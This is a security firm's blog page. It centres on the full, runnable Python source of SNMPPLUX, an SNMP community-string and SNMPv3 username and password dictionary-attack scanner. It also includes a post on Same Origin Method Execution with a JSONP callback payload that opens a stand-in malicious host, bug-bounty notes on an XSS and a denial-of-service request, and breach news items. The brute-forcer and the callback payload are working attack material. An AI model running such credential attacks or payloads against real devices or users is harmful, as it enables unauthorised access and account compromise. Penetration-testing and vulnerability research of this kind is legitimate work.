Skip to content

SNMPPLUX

snmpplux

Pentura continually develop new tools and scripts to improve the effectiveness of the team. One such tool called SNMPPLUX is an offshoot of a larger development project (ORR).
SNMPPLUX is a USM compliant SNMPv1, SNMPv2c and SNMPv3 authentication scanner powered by pysnmp, re, sys, getopt, array, time and multiprocessing python modules.
As well as providing SNMPv1 and v2c community dictionary attacks is will also provide username and password dictionary attacks for SNMPv3 for the following authentication types:
• SNMPv3 Auth None
• SNMPv3 Auth MD5 Priv None
• SNMPv3 Auth MD5 Priv DES
• SNMPv3 Auth SHA Priv AES128
• SNMPv3 Auth SHA Priv AES192
• SNMPv3 Auth SHA Priv AES256
• SNMPv3 Auth SHA Priv DES
• SNMPv3 Auth SHA Priv 3DES

Whilst multiprocessing is currently used to speed up testing with parallel processes the future plans. A library version of this code is also utilised as part of the ORR project.

Screenshot from 2016-03-30 16_03_13

Screenshot showing example operation The current source code for this tool is included below on an as is basis. It may need to be reformatted to remove syntax and indenting errors introduced by providing the source in this format. Please see the License/Disclaimer below before using this software:

The source can also be downloaded from github:

https://github.com/PenturaLabs/SNMPPLUX

-----------------------snmpplux0.3.py source--------------------------------
from pysnmp.hlapi import *
import re
import sys, getopt
from array import *
import time
from multiprocessing import Pool

def banner():
        print ('.')
        print (' /   _____/ \      \    /     \\______    \______   \    |   |    |   \   \/  /')
        print (' \_____  \  /   |   \  /  \ /  \|     ___/|     ___/    |   |    |   /\     / ')
        print (' /        \/    |    \/    Y    \    |    |    |   |    |___|    |  / /     \ ')
        print ('/_______  /\____|__  /\____|__  /____|    |____|   |_______ \______/ /___/\  \ ')
        print ('        \/         \/         \/                           \/              \_/')
        print (' ')
        print ('Liam Romanis')
        print ('version 0.3b - beta testing')
        print ('http://www.pentura.com')
        print ('.')


def opts(argv):
    inputfile = ''
    userfile = ''
    passfile = ''
    try:
        opts, args = getopt.getopt(argv, 'i:u:p:h', ['ifile=', 'ufile=','pfile=','help'])
    except getopt.GetoptError:
        print ('test.py -i <inputfile> -u <userfile> -p <passfile> ')
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            print ('test.py -i <inputfile> -u <userfile> -p <passfile> ')
            sys.exit()
        elif opt in ('-i', '--ifile'):
            inputfile = arg
        elif opt in ('-u', '--ufile'):
            userfile = arg
        elif opt in ('-p', '--pfile'):
            passfile = arg

    return inputfile, userfile, passfile



def snmp1dict(ip, comm):
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),CommunityData(comm, mpModel=0),UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('1.3.6.1.2.1.1.1.0'))))
        if errorIndication:
                pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv1: %s: Community:%s" %(ip,comm))



def snmp2dict(ip, comm):
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),CommunityData(comm),UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('1.3.6.1.2.1.1.1.0'))))
        if errorIndication:
                pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv2: %s: Community:%s" %(ip,comm))
         


def snmp3_authNone_privNone(ip, user):
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user),UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))
        if errorIndication:
                pass
        elif errorStatus:
                pass
        else:
                print ("SNMPv3 Auth None Priv None: %s: %s - no pass required\n" %(ip, user))



def snmp3_authMD5_privNone(ip, user, passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd),UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))
        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth MD5 Priv None: %s: %s:%s" % (ip, user, passwd))
    except:
        print ('exception caused by: %s:%s' % (user,passwd))
        pass

def snmp3_authMD5_privDES(ip, user, passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd),UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))
        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            sys.stdout.flush()
            print ("SNMPv3 Auth MD5 Priv DES: %s: %s:%s" % (ip,user,passwd))
    except:
        print ('exception caused by: %s:%s' % (user,passwd))
        pass

def snmp3_authSHA_privAES128(ip,user,passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd, authProtocol=usmHMACSHAAuthProtocol, privProtocol=usmAesCfb128Protocol), UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))
        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth SHA Priv AES128: %s:%s:auth:usmHMACSHAAuthProtocol:priv:usmAesCfb128Protocol" % (user,passwd))
    except:
        print ('exception caused by: %s:%s:usmHMACSHAAuthProtocol:usmAesCfb128Protocol' % (user,passwd))
        pass


def snmp3_authSHA_privAES192(ip,user,passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd, authProtocol=usmHMACSHAAuthProtocol, privProtocol=usmAesCfb192Protocol), UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))

        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth SHA Priv AES192: %s:%s:auth:usmHMACSHAAuthProtocol:priv:usmAesCfb192Protocol" % (user,passwd))
    except:
        print ('exception caused by: %s:%s:usmHMACSHAAuthProtocol:usmAesCfb192Protocol' % (user,passwd))
        pass


def snmp3_authSHA_privAES256(ip,user,passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd, authProtocol=usmHMACSHAAuthProtocol, privProtocol=usmAesCfb256Protocol), UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))

        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth SHA Priv AES256: %s:%s:auth:usmHMACSHAAuthProtocol:priv:usmAesCfb256Protocol" % (user,passwd))
    except:
        print ('exception caused by: %s:%s:usmHMACSHAAuthProtocol:usmAesCfb256Protocol' % (user,passwd))
        pass


def snmp3_authSHA_privDES(ip,user,passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd, authProtocol=usmHMACSHAAuthProtocol, privProtocol=usmDESPrivProtocol), UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))

        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth SHA Priv DES: %s:%s:auth:usmHMACSHAAuthProtocol:priv:usmDESPrivProtocol" % (user,passwd))
    except:
        print ('exception caused by: %s:%s:usmHMACSHAAuthProtocol:usmDESPrivProtocol' % (user,passwd))
        pass

def snmp3_authSHA_priv3DES(ip,user,passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd, authProtocol=usmHMACSHAAuthProtocol, privProtocol=usm3DESEDEPrivProtocol), UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))

        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth SHA Priv 3DES: %s:%s:auth:usmHMACSHAAuthProtocol:priv:usm3DESEDEPrivProtocol" % (user,passwd))
    except:
        print ('exception caused by: %s:%s:usmHMACSHAAuthProtocol:usm3DESEDEPrivProtocol' % (user,passwd))
        pass

def snmp12_helper(args):
    return snmp1dict(*args), snmp2dict(*args)

def snmp3none_helper(args):
    return snmp3_authNone_privNone(*args)

def snmp3md5none_helper(args):
    return snmp3_authMD5_privNone(*args), snmp3_authMD5_privDES(*args)

def snmp3shaaes_helper(args):
    return snmp3_authSHA_privAES128(*args), snmp3_authSHA_privAES192(*args), snmp3_authSHA_privAES256(*args), snmp3_authSHA_privDES(*args), snmp3_authSHA_priv3DES(*args)



if __name__ == "__main__":
    banner()
    inputfile, userfile, passfile = opts(sys.argv[1:])

    with open(inputfile, "r") as ins:
            targs = []
            for line in ins:
                    line = line.replace("\n", "")
                    targs.append(line)
            
    with open(userfile, "r") as ins:
            users= []
            for line in ins:
                    line = line.replace("\n", "")
                    users.append(line)

    with open(passfile, "r") as ins:
        passwords = []
        for line in ins:
            if (len(line) > 8):
                line = line.replace("\n", "")
                passwords.append(line)

    with open("dict.txt", "r") as ins:
        communities = []
        for line in ins:
            line = line.replace("\n", "")
            communities.append(line)

    p = Pool(20)
    job1_args = [(ip, comm) for comm in communities for ip in targs]
    p.map(snmp12_helper, job1_args)
    job2_args = [(ip, user) for user in users for ip in targs]
    p.map(snmp3none_helper, job1_args)
    job3_args = [(ip, user, passwd) for ip in targs for user in users for passwd in passwords]
    p.map(snmp3md5none_helper, job3_args)
    job4_args = [(ip, user, passwd) for ip in targs for user in users for passwd in passwords] 
    p.map(snmp3shaaes_helper, job4_args)

—————————————————————————–

LICENSE

Copyright ©2016 Pentura Ltd. This copyright applies to the Pentura codebase as a whole, or any individual distributed application. The individual contributions of government employees, which may be identified on a per-file basis are in the public domain. The software and content provided on this website are made available under the terms of the Apache License, Version 2.0. A copy of the License is available at:     http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an “AS IS” BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

DISCLAIMER

THIS SOFTWARE AVAILABLE ON THE SITE http://www.pentura.com IS PROVIDED “AS IS” AND ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL Pentura Ltd, OR ANY OF THEIR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. Without limiting the foregoing, Pentura Ltd make no warranty that: •    the software will meet your requirements. •    the software will be uninterrupted, timely, secure or error-free. •    the results that may be obtained from the use of the software will be effective, accurate or reliable. •    the quality of the software will meet your expectations. •    any errors in the software obtained from the OpenSHA.org web site will be corrected. Software and its documentation made available on the http://www.pentura.com web site: •    could include technical or other mistakes, inaccuracies or typographical errors. Pentura contributors may make changes to the software or documentation made available on its web site. •    may be out of date and Pentura and its contributors make no commitment to update such materials. Pentura, and its contributors, assume no responsibility for errors or ommissions in the software or documentation available from the http://www.pentura.com web site. In no event shall Pentura, or it’s contributors be liable to you or any third parties for any special, punitive, incidental, indirect or consequential damages of any kind, or any damages whatsoever, including, without limitation, those resulting from loss of use, data or profits, whether or not Pentura and its contributors has been advised of the possibility of such damages, and on any theory of liability, arising out of or in connection with the use of this software. The use of the software downloaded through the http://www.pentura.com site is done at your own discretion and risk and with agreement that you will be solely responsible for any damage to your computer system or loss of data that results from such activities. No advice or information, whether oral or written, obtained by you from Pentura, its website or its contributors shall create any warranty for the software.

Finding and Exploiting Same Origin Method Execution vulnerabilities

Recently it came to my attention that it was possible to abuse JSONP callbacks using a vulnerability known as SOME – Same Origin Method Execution which can be used by an attacker to widely abuse a user’s trust between the web application and the intended flow of execution. For example, using the SOME attack it is possible for an attacker to trick a user to visiting a malicious web-page which contains a link to the host’s web application API with a JSONP callback parameter which the attacker can then control.

An example of this would be as follows:
http://example.com/api/get_user.json?id=1&callback=logResults

The above URL could be an example of a method for a third-party to obtain user accounts associated with the user ID 1 and would return something similar to the following:
logResults({"username": "admin", "email_address":"test@example.com"});

However, using the SOME attack it is possible to change the callback function to be anything that Javascript or the API recognises. An example of which could be the following:
http://example.com/api/get_user.json?id=1&callback=window.open('http://malicious.site/evil.php');//

Which would return something similar to the following:
window.open('http://malicious.site/evil.php');//({"username": "admin", "email_address":"test@example.com"});

Using this example the above URL would open a window from the user’s browser and direct them to http://malicious.site/evil.php (and prevent the rest of the response from being parsed) which could infect the user’s browser with a persistent XSS malware such as BeEF or similar.

A lot of web applications contain the Same Origin Policy headers which attempts to prevent attackers from loading pages or resources from external entities. However this attack bypasses this in two ways. The first way is that JSONP or JSON with Padding is expected to be used externally as that is what it was designed to be used for and the second way is that all calls to the resource is loaded from the same origin which means that the request never gets picked up from the Same Origin Policy.

Whilst performing some testing with this vulnerability, I found that it was also possible to abuse this vulnerability remotely by bypassing the Same Origin Policy using a few tricks such as loading the affected URL directly from an <img src=""> tag or a <script> tag which do not get prevented from the Same Origin Policy. This allows an attacker to perform virtually unlimited amount of actions on the application under the context of the unsuspecting victim user. These actions could range from stealing personal images, releasing data, stealing cookies or just performing malicious acts such as infecting the user with BeEF.

During this research I found that most of the major websites, including Microsoft, Facebook, Google, etc are all vulnerable to this type of attack. The one thing they all have in common is open-source Javascript frameworks from jQuery, PrototypeJS, AngularJS and more. These Javascript frameworks appear to allow for the SOME vulnerability to be present without any way of removing the functionality (easily).

SOME Example

[IRCCloud] History and Another XSS Bug Bounty

Personally, I have been a user of IRC since 2004 on some private networks and some other well-known ones such as Freenode. However, it was always inconvenient to have to set up an IRC Bouncer, so when IRCCloud came around, I was excited to try it and see if it provided me with a method of staying connected to all the required networks without having to download a new client on every computer I was on (as it’s a web service).

After trying the Beta which was a free option before they publicly released the paid version, I thought I’d try and find some vulnerabilities to report to them – for no other reason than to ensure that the service that I am using can’t be exploited to disclose any of my information or data.

The first issue I identified was that the application has a pastebin feature for when the user pastes a large amount of text, they get the option for uploading to their own proprietary pastebin service.

IRCCloud Pastebin

However, after performing some testing to execute javascript within the resulting pastebin link, it was found that it was possible to insert a new line (\n) and then a Cross Site Scripting payload, which got executed to full pre-authenticated Persistent Cross Site Scripting.

Read the full report on HackerOne.

[IRCCloud] Inadequate input validation on API endpoint leading to self denial of service and increased system load

So as you do, I was just looking around, manually fuzzing some Web Sockets requests, seeing if I could get any sort of XSS, Remote IRC Command Injection or SQLi mainly – ended up that I didn’t find much there that worse worth noting. So I started seeing if their logic was all alright, so one of their requests looked similar to:

{“_reqid”:1234, “cid”:5678, “to”: “#treehouse”, “msg”:”test”, “method”:”say”}

I thought, alright, what if I can send a message to multiple channels, so I changed the “to” parameter to be an array: “to”:[“#treehouse”, “#darkscience”] – Then all of a sudden my account gets disabled. So I booted up irssi and jumped on to the support channel to speak to the security engineers there. RJ (the one I spoke to) confirmed that the request put my account into an infinite loop attempting to send to a string-type channel but an array was given. This started filling up the internal queues and started increasing the RAM usage. He then fixed the issue with some difficulty. So as a report I submitted it to HackerOne just so they had a track of it.

With some further discussion with RJ and James (Another IRCCloud security engineer), it would have been possible to create multiple “test accounts” which would have been propagated over the other servers, performed the attack across the test accounts, which in turn may have brought down the servers due to lack of Disk Space or resources available.

IRCCloud were brilliant in dealing with the report, and the timely responses that were received by James, even when it was out of working hours, was by far the best that I had ever seen. *tilts hat to James*

Here is the full report issued to IRCCloud on HackerOne.

Most businesses do not understand data breach risks

by

Research by HP has uncovered a lack of understanding among businesses of the risks associated with data breaches. More than 70% of US and UK executives surveyed by the Ponemon Institute said that their organisation does not understand fully the dangers of breaches, while less than half of top executives and board members are kept informed about the response process.

The 2014 Executive Breach Preparedness Research Report was designed to highlight the importance of senior executive involvement in the response to data breaches.  While 79% of the nearly 500 senior executives polled agreed that executive-level involvement in the response process was necessary to a successful resolution, only 45% said that they were accountable for the process. The research also found that most executives are more concerned about threats from within their business than external attacks.

As we discussed last week, the financial cost of data breaches can be huge, not to mention the missed revenues due to reputational damage. This is why direction and leadership is needed from those at the top. Executives need to be aware of and actively involved in the data breach response process, and there needs to be a clear plan in place to prevent security incidents from escalating to a complete disaster for the company.

The Ponemon Institute noted that senior executives and board members may have been complacent about the effects of cyber-attacks and data breaches in the past, but are now gradually realising the damaging costs of such incidents. This is welcome news and we hope that senior executives will continue to take a more active role in their response to data breaches, educating themselves and their staff about the risks and start investing in the best security technology available.

Research Reveals Cost of Online Fraud to UK

by

This week has been Get Safe Online Week and to coincide with the event, the National Fraud Intelligence Bureau researched cyber-crime in the UK. The research found that over the last year, the ten biggest online scams cost victims over £670m – although the actual figure is thought to be significantly higher than that due to unreported crimes.

A separate poll found that while over half of Britons have been a victim of either online fraud, ID theft, hacking or online abuse, only a third of them reported the crime. One of the reasons for this is that many people did not know how to report the crime.  It is hoped that this will be improved by the development of Action Fraud, the UK’s national fraud reporting centre, and the increasing resources that the Government is dedicating to cyber-crime.

The research also suggests that cyber-crime is increasingly being taken more seriously by the British public. Around 53% said they now see it as a serious “physical world” crime and 42% stated that they are now more vigilant when shopping online. Despite this change in attitude, many people are still failing to take basic security measures with 67% of tablet owners and 54% of mobile phone owners in the survey not having a password or PIN to secure their device.

It’s good to see that initiatives like Get Safe Online Week and Action Fraud are raising awareness of online crimes and what people can do to prevent it. However, this research is a stark reminder of the dangers that we all face online. Online fraud continues to increase as crime overall falls, with criminals constantly developing new ways of targeting victims online.

At Pentura we believe that education is the key in the fight against cyber-crime. Our LearnwithPentura e-learning portal provides users with advice on security and best practice, with eight online modules ranging from email to removable media. Complacency is not an option, and businesses and authorities must continue to raise awareness of the dangers of online crime and educate users in cyber security.

Kmart hit by card hack attack

by

It’s been revealed that a data breach at US retail chain Kmart that compromised card details lasted over a month. The discount department store said that the malware was discovered last week but had been operating since early September. Based on its investigation so far, the company said that it believes credit and debit cards were exposed but that no personal information, PIN numbers, email addresses or social security numbers were accessed.

The incident is the latest in a string of cyber-attacks on American retailers. Last week, restaurant chain Dairy Queen revealed that hackers had stolen names, card numbers and expiration dates of around 600,000 cards across 395 of its restaurants. There have also been huge recent attacks on Home Depot, in which 56 million cards were affected, and on Target, when 40 million cards were compromised in the run-up to Christmas 213.

It’s not thought that the breached information is being used to create counterfeit cards or encumber customers with bills for items that they haven’t bought. Nevertheless, the attack is a reminder and a warning to retailers that the sheer size of their computer networks makes them an attractive target to hackers. By improving detection times, large chains will reduce the damage caused by such breaches and better protect both their customers and their reputation.

AT&T suffers insider data breach

by

AT&T has become the latest multinational company to suffer a data breach after one of its own employees gained access to customer data. The US mobile telecoms giant has started informing around 1,600 customers in Vermont that their personal data was breached in August.

In a letter posted on the Vermont government’s website, AT&T confirmed that a former employee had broken the company’s privacy policy and obtained customer data, including unique customer numbers, social security numbers and driver’s license numbers. AT&T has not said why the employee stole the information or whether he used it for malicious purposes, but it is nevertheless a serious breach and the federal authorities have been informed.

Although this is a smaller incident in comparison to recent cyber-attacks on JPMorgan Chase and iCloud, it is a reminder to IT managers about the dangers of insider data breaches. Whether intentional or not, internal breaches can be equally as damaging as external attacks and IT departments ignore this at their peril. Ensuring that your internal policies and controls are watertight and that employees are educated in data security is just as important as protecting your network from outside cyber-attacks.

New security flaw uncovered in WordPress

by

Researchers have revealed a potentially serious flaw in WordPress software, that allows hackers to search for abandoned or inactive WordPress sites before mounting phishing attacks aimed at enticing users to install infected updates.  Hackers can then quickly hijack the website and direct visitors to deliver malicious content.

WordPress is by far the most popular content management system. Having initially found success as a blogging platform, it is now hugely popular for business websites, operating as either a framework or a hosting service. However, the open-source nature of the system, as well as its popularity among web novices, does make it vulnerable when flaws are found. The report encountered several compromised WordPress websites.

WordPress offers a potentially easy entry point for hackers to introduce malware onto networks. Failing to maintain and update WordPress websites and plugins businesses are leaving themselves susceptible to attack. Businesses should be informing staff to only install updates and plugins from trusted sources and increasing awareness of this tactic. By properly educating staff and regularly updating WordPress businesses will be able to close off any potential weaknesses and reduce their susceptibility to attack.

Shell Shock Rapid 7 Threatsweeper

by

By now, you may have heard about CVE-2014-6271, also known as the “bash bug“, or even “Shell Shock”, that may affect your organisation. It’s rated the maximum CVSS score of 10 for impact and ease of exploitability. The affected software, Bash (the Bourne Again SHell), is present on most Linux, BSD, and Unix-like systems, including Mac OS X. New packages were released today, but further investigation made it clear that the patched version may still be exploitable, and at the very least can be crashed due to a null pointer exception. The incomplete fix is being tracked as CVE-2014-7169.

How do you protect yourself?

The most straightforward answer is to deploy the patches that have been released as soon as possible. Even though CVE-2014-6271 is not a complete fix, the patched packages are more complicated to exploit. We expect to see new packages arrive to address CVE-2014-7169 in the near future. If you have systems that cannot be patched (for example systems that are End-of-Life), it’s critical that they are protected behind a firewall. And test whether that firewall is secure.

How can we help?

Pentura Threatsweeper service (Powered by Rapid7) has been updated with authenticated and remote checks for CVE-2014-6271. Checks for CVE-2014-7169 will follow as soon as they are verified.

If you have any questions, please contact the Pentura support team: support@pentura.com

Many thanks,

The Pentura Team